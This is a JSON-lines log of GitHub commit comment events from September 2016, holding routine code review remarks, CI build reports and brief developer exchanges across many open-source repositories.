{"id":"4534770287","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18946788,"position":null,"line":null,"path":null,"commit_id":"9cfc0410a8eab450e0bed5f5739a310648762fff","created_at":"2016-09-08T15:27:08Z","updated_at":"2016-09-08T15:27:08Z","body":"I'm available to do some MP testing this afternoon CST."}},"created_at":"2016-09-08T15:27:08Z"}
{"id":"4534772750","type":"CommitCommentEvent","actor":{"login":"gvtulder"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":18946794,"position":null,"line":null,"path":null,"commit_id":"09a9e80b351cc974c348e2f1134bf94d3b122787","created_at":"2016-09-08T15:27:27Z","updated_at":"2016-09-08T15:27:27Z","body":"Here's a little patch that would add 5d support to the GPU batch normalization ops (see #4931).\r\n\r\nThe tests pass now, but I'm not really sure about the tolerances used in the tests. Some tests would fail with what seemed to be relatively small differences. Using larger input values and changing some of the atol/rtol values fixed that."}},"created_at":"2016-09-08T15:27:27Z"}
{"id":"4534774696","type":"CommitCommentEvent","actor":{"login":"bcivel"},"repo":{"name":"vertigo17/Cerberus"},"payload":{"comment":{"id":18946801,"position":72,"line":493,"path":"source/src/main/java/org/cerberus/crud/dao/impl/SoapLibraryDAO.java","commit_id":"1154665ffa5c1ad32373424b26622fe692a452af","created_at":"2016-09-08T15:27:44Z","updated_at":"2016-09-08T15:27:44Z","body":"Hello @Foudro \r\nCould you please use the acronym `sol` instead of the full name (and also in the loadFromResultSet method)?\r\n\r\nIt will allow to make the loadFromResultSet method usable from other class, even if we join on another table that contains the same column name.\r\n\r\nYou can find information there : https://github.com/vertigo17/Cerberus/blob/master/docs/Objects_Pages_status.ods\r\n\r\nThanks"}},"created_at":"2016-09-08T15:27:44Z"}
{"id":"4534775483","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalconslayer/framework"},"payload":{"comment":{"id":18946803,"position":20,"line":104,"path":"src/Clarity/Console/Vendor/NewCommand.php","commit_id":"596185ba4e352171548da4e701f49fcb90244c29","created_at":"2016-09-08T15:27:51Z","updated_at":"2016-09-08T15:27:51Z","body":"How about this?\r\n\r\n```php\r\nif (false === strpos($package, '/')) {\r\n    // This will stop execution?\r\n    $this->error('Package name must have a <vendor>/<name>');\r\n}\r\n\r\n$package_has_slash = true;\r\n```"}},"created_at":"2016-09-08T15:27:51Z"}
{"id":"4534775747","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18946805,"position":null,"line":null,"path":null,"commit_id":"8d0e592e531686dccd172cfee82bd7577859e147","created_at":"2016-09-08T15:27:54Z","updated_at":"2016-09-08T15:27:54Z","body":"FixAgainCentroidForNonConvex (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T15:27:54Z"}
{"id":"4534777373","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18946809,"position":4,"line":158,"path":"static/js/controllers/inbox.js","commit_id":"fc4c17d82ccd2d975c71d09225a27a41c240acbd","created_at":"2016-09-08T15:28:10Z","updated_at":"2016-09-08T15:28:10Z","body":"I'm not entirely clear what this function does - does it clear the \"selected\" property, or reset the \"selected\" to the current value?"}},"created_at":"2016-09-08T15:28:10Z"}
{"id":"4534779322","type":"CommitCommentEvent","actor":{"login":"lijiansong"},"repo":{"name":"lijiansong/Postgraduate-Course"},"payload":{"comment":{"id":18946814,"position":null,"line":null,"path":null,"commit_id":"fb505f27b75a2bf03d0119ec87b8861e2dafaaa8","created_at":"2016-09-08T15:28:27Z","updated_at":"2016-09-08T15:28:27Z","body":"VLDB2005"}},"created_at":"2016-09-08T15:28:27Z"}
{"id":"4534780922","type":"CommitCommentEvent","actor":{"login":"Innescwf"},"repo":{"name":"Innescwf/FirstRepository"},"payload":{"comment":{"id":18946820,"position":null,"line":null,"path":null,"commit_id":"fa2efc027f1c3048dc2eb5a27d80ece8c9262205","created_at":"2016-09-08T15:28:42Z","updated_at":"2016-09-08T15:28:42Z","body":"'<git push -u origin master>'\r\nto upload commits from local machine"}},"created_at":"2016-09-08T15:28:42Z"}
{"id":"4534785251","type":"CommitCommentEvent","actor":{"login":"repeatedly"},"repo":{"name":"fluent/serverengine"},"payload":{"comment":{"id":18946828,"position":5,"line":20,"path":"serverengine.gemspec","commit_id":"a5883f0756b124805609037e49eedea6d4a97ee4","created_at":"2016-09-08T15:29:21Z","updated_at":"2016-09-08T15:29:21Z","body":"You don't need the fork. Following step seems enough for your case.\r\n\r\n```\r\n$ gem install fluentd -v 0.12.29\r\n$ gem install fluent-plugin-websocket\r\n```"}},"created_at":"2016-09-08T15:29:21Z"}
{"id":"4534786881","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18946831,"position":68,"line":88,"path":"algebra/group_constructions.hlean","commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T15:29:35Z","updated_at":"2016-09-08T15:29:35Z","body":"For the other parts: we want a theorem `isomorphism.sigma_char` which states that `isomorphism` is equivalent to some sigma-type. This shows that `G ≃g G` is a set. For the other parts, it's useful to have a theorem `isomorphism_eq` which states that two isomorphisms are equal if the underlying functions are homotopic.\r\nNote: `isomorphism.symm` and `isomorphism.refl` are also already defined."}},"created_at":"2016-09-08T15:29:35Z"}
{"id":"4534790301","type":"CommitCommentEvent","actor":{"login":"rwjblue"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":18946837,"position":9,"line":11,"path":"packages/ember-template-compiler/lib/system/compile-options.js","commit_id":"237c04c62526e7ba506dad16413cb54d06882d58","created_at":"2016-09-08T15:30:08Z","updated_at":"2016-09-08T15:30:08Z","body":"Good point (I made the change to add it above after this and forgot to remove the `||`)."}},"created_at":"2016-09-08T15:30:08Z"}
{"id":"4534790903","type":"CommitCommentEvent","actor":{"login":"mikeatlas"},"repo":{"name":"fluent/serverengine"},"payload":{"comment":{"id":18946838,"position":5,"line":20,"path":"serverengine.gemspec","commit_id":"a5883f0756b124805609037e49eedea6d4a97ee4","created_at":"2016-09-08T15:30:15Z","updated_at":"2016-09-08T15:30:15Z","body":"Thanks @repeatedly I'll give that a shot."}},"created_at":"2016-09-08T15:30:15Z"}
{"id":"4534792212","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18946843,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-08T15:30:25Z","updated_at":"2016-09-08T15:30:25Z","body":"UPD2:\r\n\r\nКажется, понял. В коде класс `Route` находится ниже класса `Train`, поэтому к моменту вызова этого метода еще ни один route не создался. Как это решить?)"}},"created_at":"2016-09-08T15:30:25Z"}
{"id":"4534799018","type":"CommitCommentEvent","actor":{"login":"mbeltagy"},"repo":{"name":"henrikbostrom/RandomForest"},"payload":{"comment":{"id":18946863,"position":null,"line":null,"path":null,"commit_id":"8e64ad6a9d5678a60ad209a7e50eafc8b0a8ee23","created_at":"2016-09-08T15:31:26Z","updated_at":"2016-09-08T15:31:26Z","body":"In RandomForest.jl basically trailing spaces were removed. No functional changes....yet. "}},"created_at":"2016-09-08T15:31:26Z"}
{"id":"4534799931","type":"CommitCommentEvent","actor":{"login":"fpvandoorn"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18946866,"position":74,"line":94,"path":"algebra/group_constructions.hlean","commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T15:31:34Z","updated_at":"2016-09-08T15:31:34Z","body":"Yes, that would be useful. A slight modification which I like a bit better:\r\nhave a predicate `is_normal R` for `R : G -> Prop` which states that `R` is normal (so for arbitrary relations of `G`, not just subgroups."}},"created_at":"2016-09-08T15:31:34Z"}
{"id":"4534800336","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18946867,"position":null,"line":null,"path":null,"commit_id":"2d0d971e001cb2edf40c24acfbc99682fd6f7493","created_at":"2016-09-08T15:31:37Z","updated_at":"2016-09-08T15:31:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 974](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12984&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:44"}},"created_at":"2016-09-08T15:31:37Z"}
{"id":"4534804106","type":"CommitCommentEvent","actor":{"login":"peshi"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18946873,"position":null,"line":null,"path":null,"commit_id":"e12f8bfe51ebbc18d9ef8b18d427d4b4a54a8ee5","created_at":"2016-09-08T15:32:12Z","updated_at":"2016-09-08T15:32:12Z","body":"@XWB for consistency maybe $user and $request should switch places in the constructor of GetResponseNullableUserEvent.php, also add missing @Event annotation in FOSUserEvents.php"}},"created_at":"2016-09-08T15:32:12Z"}
{"id":"4534812734","type":"CommitCommentEvent","actor":{"login":"peshi"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":18946888,"position":null,"line":null,"path":null,"commit_id":"d7e1f2f89228291acb0a5fcf9db02810ca7f6716","created_at":"2016-09-08T15:33:28Z","updated_at":"2016-09-08T15:33:28Z","body":"@XWB Missing @Event annotation."}},"created_at":"2016-09-08T15:33:28Z"}
{"id":"4534813433","type":"CommitCommentEvent","actor":{"login":"rwjblue"},"repo":{"name":"emberjs/ember.js"},"payload":{"comment":{"id":18946890,"position":33,"line":37,"path":"packages/ember-template-compiler/lib/system/compile.js","commit_id":"237c04c62526e7ba506dad16413cb54d06882d58","created_at":"2016-09-08T15:33:33Z","updated_at":"2016-09-08T15:33:33Z","body":"Ya, the `precompile` being used here is the one from `glimmer-compiler`. What we should do is change this around to funnel all calls through to our own `precompile` (lets us remove the duplicated `throw new Error` code too):\r\n\r\n```js\r\nimport precompile from './precompile';\r\n\r\nexport default function compile(templateString, options) {\r\n  let precompiledTemplateString = precompile(templateString, compileOptions(options));\r\n  let templateJS = new Function(`return ${precompiledTemplateString}`)();\r\n  return template(templateJS);\r\n}\r\n```"}},"created_at":"2016-09-08T15:33:33Z"}
{"id":"4534819257","type":"CommitCommentEvent","actor":{"login":"jtbandes"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18946910,"position":207,"line":125,"path":"Frameworks/OakAppKit/src/OakPopOutAnimation.mm","commit_id":"dd3ebefe3f60b323af5a6b1e104c04b43da78eeb","created_at":"2016-09-08T15:34:25Z","updated_at":"2016-09-08T15:34:25Z","body":"Oops, I always forget about that.\r\n\r\nHow about breaking the cycle (`delegate = nil`) after closing the window?"}},"created_at":"2016-09-08T15:34:25Z"}
{"id":"4534824322","type":"CommitCommentEvent","actor":{"login":"marcoconti83"},"repo":{"name":"wireapp/wire-ios-sync-engine"},"payload":{"comment":{"id":18946923,"position":216,"line":216,"path":"Source/Synchronization/Decoding/EventDecoder.swift","commit_id":"0820934c50585fddb787642751b4d66017eedefe","created_at":"2016-09-08T15:35:13Z","updated_at":"2016-09-08T15:35:13Z","body":"This line causes a threading violation in Core Data. This code is executed on the sync engine thread, but `nextEvents` executes a fetch on the `eventMOC`, which has its own private queue, and should only be executed inside a `performGroupedBlock:`.\r\nPlease do not use a `performGroupedBlockAndWait:`, it will risk deadlock. Instead, since this function already has a completion block, we should turn this into an async function."}},"created_at":"2016-09-08T15:35:13Z"}
{"id":"4534832438","type":"CommitCommentEvent","actor":{"login":"luccioman"},"repo":{"name":"yacy/yacy_search_server"},"payload":{"comment":{"id":18946942,"position":null,"line":null,"path":null,"commit_id":"44b4d3984e54a5d2ce35360794cd1a82ffb6a273","created_at":"2016-09-08T15:36:23Z","updated_at":"2016-09-08T15:36:23Z","body":"This is a complementary fix for mantis 679 (http://mantis.tokeek.de/view.php?id=679), as the problem described there was still occuring when setting YaCy language to French.\r\nThe OpenSearch description was apparently not translated in other lanquages."}},"created_at":"2016-09-08T15:36:23Z"}
{"id":"4534839366","type":"CommitCommentEvent","actor":{"login":"jordonbiondo"},"repo":{"name":"rosston/dotfiles"},"payload":{"comment":{"id":18946959,"position":null,"line":null,"path":null,"commit_id":"184617f1209558a8d2012284ee758ba2b1e2c3f5","created_at":"2016-09-08T15:37:26Z","updated_at":"2016-09-08T15:37:26Z","body":"replacing values with `(random 100)` may yield more consistent results"}},"created_at":"2016-09-08T15:37:26Z"}
{"id":"4534839788","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18946960,"position":35,"line":137,"path":"fcrepo-import/src/main/java/org/fcrepo/importer/Importer.java","commit_id":"e2c64903b2b8885d7d0cbdddcb841c9d07d9cb26","created_at":"2016-09-08T15:37:29Z","updated_at":"2016-09-08T15:37:29Z","body":"I can't remember, does `RDFDataMgr.parse` guarantee to close the `InputStream` handed to it? If not, should we?"}},"created_at":"2016-09-08T15:37:29Z"}
{"id":"4534842564","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18946964,"position":46,"line":46,"path":"fcrepo-import/src/main/java/org/fcrepo/importer/SubjectMappingStreamRDF.java","commit_id":"e2c64903b2b8885d7d0cbdddcb841c9d07d9cb26","created_at":"2016-09-08T15:37:56Z","updated_at":"2016-09-08T15:37:56Z","body":"Should these all be `private`?"}},"created_at":"2016-09-08T15:37:56Z"}
{"id":"4534844524","type":"CommitCommentEvent","actor":{"login":"gkiagia"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":18946970,"position":16,"line":566,"path":"TelepathyQt/base-channel.cpp","commit_id":"03f72590057f84ba39b54d5f8809e07b1846ec4c","created_at":"2016-09-08T15:38:15Z","updated_at":"2016-09-08T15:38:15Z","body":"foreach will soon be deprecated, don't use it. upstream suggests C++11 for() https://www.kdab.com/goodbye-q_foreach/"}},"created_at":"2016-09-08T15:38:15Z"}
{"id":"4534852027","type":"CommitCommentEvent","actor":{"login":"gkiagia"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":18946984,"position":9,"line":551,"path":"TelepathyQt/base-channel.cpp","commit_id":"1cdff7dc1bf7c40fce15c687fb16038d0f60ea71","created_at":"2016-09-08T15:39:23Z","updated_at":"2016-09-08T15:39:23Z","body":"same here (foreach)"}},"created_at":"2016-09-08T15:39:23Z"}
{"id":"4534853450","type":"CommitCommentEvent","actor":{"login":"EgbertRijke"},"repo":{"name":"cmu-phil/Spectral"},"payload":{"comment":{"id":18946989,"position":null,"line":null,"path":null,"commit_id":"9f4436d5053c2a19a0692afd1bb565e411a56293","created_at":"2016-09-08T15:39:36Z","updated_at":"2016-09-08T15:39:36Z","body":"Thanks for the further comments Floris!"}},"created_at":"2016-09-08T15:39:36Z"}
{"id":"4534854977","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4-labs/fcrepo-import-export"},"payload":{"comment":{"id":18946993,"position":75,"line":75,"path":"fcrepo-import/src/main/java/org/fcrepo/importer/SubjectMappingStreamRDF.java","commit_id":"e2c64903b2b8885d7d0cbdddcb841c9d07d9cb26","created_at":"2016-09-08T15:39:49Z","updated_at":"2016-09-08T15:39:49Z","body":"I'm not sure this is correct. I think you might want to make `sink` a `StreamRDF` and call `finish` on it here. If you did that, in fact, you could start by subclassing `StreamRDFWrapper` for a little more concision."}},"created_at":"2016-09-08T15:39:49Z"}
{"id":"4534855566","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":18946994,"position":null,"line":null,"path":null,"commit_id":"a20d6cc0c8800ce83cb4b85bf37a517d04bf5b94","created_at":"2016-09-08T15:39:57Z","updated_at":"2016-09-08T15:39:57Z","body":"@maxpiva nvm I got it. Serialized Types were my issue."}},"created_at":"2016-09-08T15:39:57Z"}
{"id":"4534856167","type":"CommitCommentEvent","actor":{"login":"pathawks"},"repo":{"name":"jekyll/jekyll-seo-tag"},"payload":{"comment":{"id":18946999,"position":null,"line":null,"path":null,"commit_id":"2631e3ea77c5863fbc81f55222fdf3c06eda0f88","created_at":"2016-09-08T15:40:03Z","updated_at":"2016-09-08T15:40:03Z","body":"🎉 "}},"created_at":"2016-09-08T15:40:03Z"}
{"id":"4534858132","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18947009,"position":null,"line":null,"path":null,"commit_id":"67422896564f96bc33c007d782639e86988f2131","created_at":"2016-09-08T15:40:23Z","updated_at":"2016-09-08T15:40:23Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-67422896564f96bc33c007d782639e86988f2131-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-67422896564f96bc33c007d782639e86988f2131-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T15:40:23Z"}
{"id":"4534863525","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"wolfgangmm/monex"},"payload":{"comment":{"id":18947029,"position":5,"line":45,"path":"modules/app.xql","commit_id":"0138546644a6a1ba07a9bfec5c55d4004452a38a","created_at":"2016-09-08T15:41:12Z","updated_at":"2016-09-08T15:41:12Z","body":"A typo?"}},"created_at":"2016-09-08T15:41:12Z"}
{"id":"4534863802","type":"CommitCommentEvent","actor":{"login":"cjqian"},"repo":{"name":"aspnet/Mvc"},"payload":{"comment":{"id":18947030,"position":null,"line":null,"path":null,"commit_id":"4677bf13fa45c9b114e85c8a809437948741281c","created_at":"2016-09-08T15:41:14Z","updated_at":"2016-09-08T15:41:14Z","body":":+1: :+1: :+1: "}},"created_at":"2016-09-08T15:41:14Z"}
{"id":"4534865411","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"gorhill/uBO-WebSocket"},"payload":{"comment":{"id":18947037,"position":97,"line":97,"path":"contentscript.js","commit_id":"a4c85f0ae004e332e932b6d6452e3fa75fc6f7f8","created_at":"2016-09-08T15:41:29Z","updated_at":"2016-09-08T15:41:29Z","body":"Do you mean why the above code snippet works? The function object is autoconverted to a string so the result is the same as writing that huge string IIFE manually."}},"created_at":"2016-09-08T15:41:29Z"}
{"id":"4534867721","type":"CommitCommentEvent","actor":{"login":"techfano"},"repo":{"name":"belatrix/WebAllStars"},"payload":{"comment":{"id":18947042,"position":43,"line":32,"path":"README.md","commit_id":"c677105a6234bb706bdbbbf924dccc2f0f043095","created_at":"2016-09-08T15:41:48Z","updated_at":"2016-09-08T15:41:48Z","body":"Hola Doc @infojasyrc  no veo necesario utilizar docker en este caso :) "}},"created_at":"2016-09-08T15:41:48Z"}
{"id":"4534869646","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18947052,"position":20,"line":122,"path":"src/full/Agda/TypeChecking/Telescope.hs","commit_id":"457a2d3a8ae77f43847bb2545f1d200f76bb6c8f","created_at":"2016-09-08T15:42:07Z","updated_at":"2016-09-08T15:42:07Z","body":"This function just takes variable names as argument names, which might be wrong, see issue #2166."}},"created_at":"2016-09-08T15:42:07Z"}
{"id":"4534870170","type":"CommitCommentEvent","actor":{"login":"tasmo"},"repo":{"name":"wolfgangmm/monex"},"payload":{"comment":{"id":18947054,"position":5,"line":45,"path":"modules/app.xql","commit_id":"0138546644a6a1ba07a9bfec5c55d4004452a38a","created_at":"2016-09-08T15:42:12Z","updated_at":"2016-09-08T15:42:12Z","body":"Yes. ;)"}},"created_at":"2016-09-08T15:42:12Z"}
{"id":"4534871594","type":"CommitCommentEvent","actor":{"login":"sambozek"},"repo":{"name":"DanielEMoreno/DSI-SF-2-DanielEMoreno"},"payload":{"comment":{"id":18947055,"position":null,"line":null,"path":null,"commit_id":"89fe914c10e3192d73876eeded07f9af3671aa63","created_at":"2016-09-08T15:42:24Z","updated_at":"2016-09-08T15:42:24Z","body":"Overview\r\n\r\nOverall good work, could use a little bit more communication through labeling graphs and communicating results. Use the markdown option for your jupyter notebook cells to make it easier to interpret. Would suggest running through these exercises again with a dataset that would lend itself better to analysis than what you used for this project\r\n\r\nProblem 1\r\nThis is something fixed in the later portion of this assignment but in question one, you don’t explain anything about the data and jump in. In this case the datasets are well named, but what if they something along the lines of ’sfppi'? Very good practice to describe your data, where you got it, what your goal is with it, and a list of all of the variables you will be using for the analysis. I would suggest reading on how to write a [data dictionary](http://www.pnamp.org/sites/default/files/best_practices_for_data_dictionary_definitions_and_usage_version_1.1_2006-11-14.pdf) for describing your data.\r\nSome descriptions as to why you chose to do things the way you did would be very helpful. You’re telling a story, and using the results of your code to back it up. Additionally your graphs could use a little more context to them. Add in titles and axes labels\r\n`plt.xlabel(“Score”)`\r\nwhich will make it much easier for an outsider to interpret. \r\n\r\nThe use of a pair plot is great, but I do see some values that could come across as outliers, would be worth explaining what constituted an outlier to you or not. \r\n\r\nProblem 2\r\n\r\nReally liked the approach you took of including a baseline model versus your predicted model. There are a few questions about the graph and the model itself. You did note that it did not lend itself well to a regression analysis, especially given your incredibly low r<sup>2</sup> and cross validation scores. Again, make sure to label your graphs, will make interpretation much easier. \r\n\r\nProblem 3\r\n\r\nIs it dependent on what type of cross validation is used? Although you might see minor changes between the different types like you listed, they would not likely make much of a difference. You’re correct that a negative *adjusted* r<sup>2</sup> is negative it’s a very poor fit to the data. Not setting an intercept can also occasionally cause there to be a negative r<sup>2</sup>, for the same reasons. What if you get an r<sup>2</sup> of zero? Does that mean your model is better than if it’s negative?\r\n\r\nProblem 4\r\n\r\nAs you stated in your answer this data is not the best to run a regression on. Because the variable of inspections is ordinal, there will certainly be a skew to the data that will make it difficult to run a proper regression on. It’s best to use a classification metric on something like this and regression on continuous variables.\r\n\r\nProper use of GridSearchCV, although the results are poor on account of the data you were using. Why do you think GridSearch found the parameters it did?  \r\n\r\nProblem 5\r\n\r\nThis has been asked in every job interview, see solutions. \r\n\r\nProblem 6\r\n\r\nSee solutions"}},"created_at":"2016-09-08T15:42:24Z"}
{"id":"4534874147","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-qt"},"payload":{"comment":{"id":18947060,"position":16,"line":566,"path":"TelepathyQt/base-channel.cpp","commit_id":"03f72590057f84ba39b54d5f8809e07b1846ec4c","created_at":"2016-09-08T15:42:48Z","updated_at":"2016-09-08T15:42:48Z","body":"1) This code is meat to be in 0.9.8 release with Qt4 support and we didn't discussed if we can use C++11 in our code yet, so I think we still should use foreach here.\r\n2) Nice catch! There should be Q_FOREACH."}},"created_at":"2016-09-08T15:42:48Z"}
{"id":"4534878303","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon.ast"},"payload":{"comment":{"id":18947157,"position":null,"line":null,"path":null,"commit_id":"21ca57376fff6d4e06a3ffc85d6b3d52da44faf3","created_at":"2016-09-08T15:43:28Z","updated_at":"2016-09-08T15:43:28Z","body":"@lucaswerkmeister a bit lower, there is an `lIdentifierToCeylon()` function that also needs to use `internal`\r\n\r\n```\r\nException in thread \"main\" ceylon.language.AssertionError \"Assertion failed: First character of name must be a letter or an underscore ('_')\r\n\tviolated first.letter || first == '_'\"\r\n\tat ceylon.ast.core.LIdentifier.<init>(Identifier.ceylon:66)\r\n\tat ceylon.ast.redhat.lIdentifierToCeylon_.lIdentifierToCeylon(Identifier.ceylon:67)\r\n\tat ceylon.ast.redhat.parameterReferenceToCeylon_.parameterReferenceToCeylon(ParameterReference.ceylon:16)\r\n```"}},"created_at":"2016-09-08T15:43:28Z"}
{"id":"4534882525","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18947170,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T15:44:08Z","updated_at":"2016-09-08T15:44:08Z","body":"what problem? I saw N build on Ninja on a fast server, seemed pretty cool.\r\nIs there any memory related error?"}},"created_at":"2016-09-08T15:44:08Z"}
{"id":"4534887917","type":"CommitCommentEvent","actor":{"login":"jnorkus"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":18947184,"position":16,"line":127,"path":"angularjs/angular.d.ts","commit_id":"12ede35d5b3d5d5595ce6edf41f6f1a96ea33d1f","created_at":"2016-09-08T15:44:56Z","updated_at":"2016-09-08T15:44:56Z","body":"After updating type definitions I'm now getting errors because of this line. Consider the following code:\r\n```\r\ninterface MyInterface {\r\n  property: number;\r\n}\r\n\r\nfunction logProperty(value: MyInterface) {\r\n  if(angular.isObject(value) {\r\n    console.log(value.property);\r\n  }\r\n}\r\n```\r\n\r\nIt gives an error because value becomes an Object instead of MyInterface type after the check."}},"created_at":"2016-09-08T15:44:56Z"}
{"id":"4534892544","type":"CommitCommentEvent","actor":{"login":"treznick"},"repo":{"name":"ContinuityControl/dotfiles"},"payload":{"comment":{"id":18947196,"position":4,"line":11,"path":"home/.gitconfig.d/shared","commit_id":"5c8fc96b52c7ca05b6af7133f036b0a10501f59d","created_at":"2016-09-08T15:45:38Z","updated_at":"2016-09-08T15:45:38Z","body":"comments even before the PR! nice. I'd also love `git flow` allowed similar subcommand aliases. "}},"created_at":"2016-09-08T15:45:38Z"}
{"id":"4534893688","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18947199,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-08T15:45:48Z","updated_at":"2016-09-08T15:45:48Z","body":"The bad thing with RDB$GET_CONTEXT is that it returns a string. Perfectly fine for EXCEPTION or ERROR_MESSAGE but quite inconvinient for GDSCODE/SQLCODE or any other numeric value."}},"created_at":"2016-09-08T15:45:48Z"}
{"id":"4534893973","type":"CommitCommentEvent","actor":{"login":"philburk"},"repo":{"name":"Gundersanne/portaudio_opensles"},"payload":{"comment":{"id":18947202,"position":151,"line":151,"path":"src/hostapi/opensles/pa_hostapi_opensles.c","commit_id":"402163bdbca2e1d55e4833e9d62607057244f341","created_at":"2016-09-08T15:45:51Z","updated_at":"2016-09-08T15:45:51Z","body":"result getting overwritten. Should have bailed out."}},"created_at":"2016-09-08T15:45:51Z"}
{"id":"4534895986","type":"CommitCommentEvent","actor":{"login":"theuni"},"repo":{"name":"JeremyRubin/bitcoin"},"payload":{"comment":{"id":18947206,"position":null,"line":null,"path":null,"commit_id":"0c9d659acd4979db847f44a934060d0b29257ac9","created_at":"2016-09-08T15:46:08Z","updated_at":"2016-09-08T15:46:08Z","body":"Right, same comment applies to the final version as well. I'm trying to understand why the emplacer is used rather than just passing in batches (list/vector/etc)."}},"created_at":"2016-09-08T15:46:08Z"}
{"id":"4534904372","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18947229,"position":null,"line":null,"path":null,"commit_id":"fe8e3524453616329dedc5e5a248d44a29b95b8d","created_at":"2016-09-08T15:47:24Z","updated_at":"2016-09-08T15:47:24Z","body":"Did this work?!"}},"created_at":"2016-09-08T15:47:24Z"}
{"id":"4534906397","type":"CommitCommentEvent","actor":{"login":"adriancosma"},"repo":{"name":"tarigo/aacdecoder-android"},"payload":{"comment":{"id":18947233,"position":null,"line":null,"path":null,"commit_id":"7e08f00ff5c745208454ccc0955e752dbc3aa225","created_at":"2016-09-08T15:47:43Z","updated_at":"2016-09-08T15:47:43Z","body":"Hi, I am getting the same error when trying to build on API 24, and run on Android 6.0. Any fixes for this?"}},"created_at":"2016-09-08T15:47:43Z"}
{"id":"4534908871","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-eclipse"},"payload":{"comment":{"id":18947243,"position":13,"line":55,"path":"plugins/com.redhat.ceylon.eclipse.ui/src/com/redhat/ceylon/eclipse/util/CeylonHelper.java","commit_id":"705c39801a8ed43a46c19101c51391b4f42fa4b8","created_at":"2016-09-08T15:48:08Z","updated_at":"2016-09-08T15:48:08Z","body":"Oh gawd. It's back :-("}},"created_at":"2016-09-08T15:48:08Z"}
